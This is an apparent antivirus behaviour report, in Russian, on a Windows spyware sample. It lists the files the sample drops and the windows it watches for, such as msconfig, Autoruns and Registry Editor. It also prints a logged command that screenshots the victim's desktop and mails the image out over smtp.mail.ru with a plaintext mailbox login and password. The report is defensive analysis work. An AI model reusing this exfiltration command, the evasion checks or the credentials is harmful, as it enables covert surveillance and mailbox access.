Техническая информация
Вредоносные функции:
Создает и запускает на исполнение:
- '%WINDIR%\xvmsetup.exe' /capture /filename %WINDIR%\winlib.jpg /quality 75
- '%WINDIR%\odbconfig.exe' -smtp smtp.mail.ru -port 587 -user lzw1933@mail.ru -pass "spiderweb$+1988" -f lzw1933@mail.ru -t lzw1933@mail.ru -sub CRNJEUFU/27-6-2013 -starttls -auth -attach "%WINDIR%\winlib.jpg,image/jpeg" -M "CRNJEUFU - %USERNAME% - United States - 17:23"
- '%WINDIR%\solitaire2.exe'
- '%WINDIR%\dfmanager.exe'
Запускает на исполнение:
- '<SYSTEM32>\wscript.exe' "%WINDIR%\temp.vbs"
Изменения в файловой системе:
Создает следующие файлы:
- %WINDIR%\solitaire2.exe
- %WINDIR%\temp.vbs
- <SYSTEM32>\d3d9caps.dat
- %WINDIR%\xvmsetup.exe
- %TEMP%\nsh2.tmp
- %WINDIR%\dfmanager.exe
- %WINDIR%\odbconfig.exe
Удаляет следующие файлы:
- %WINDIR%\temp.vbs
Сетевая активность:
Подключается к:
- '94.##0.191.201':587
UDP:
- DNS ASK sm##.mail.ru
Другое:
Ищет следующие окна:
- ClassName: '(null)' WindowName: 'System Configuration'
- ClassName: '(null)' WindowName: 'Utilitaire de configuration syst?me'
- ClassName: '(null)' WindowName: 'Autoruns [CRNJEUFU\%USERNAME%] - Sysinternals: www.sysinternals.com'
- ClassName: '(null)' WindowName: 'System Configuration Utility'
- ClassName: '(null)' WindowName: 'Configuration du syst?me'
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'
- ClassName: 'SysListView32' WindowName: '(null)'
- ClassName: '(null)' WindowName: 'Registry Editor'
- ClassName: '(null)' WindowName: '?diteur du Registre'
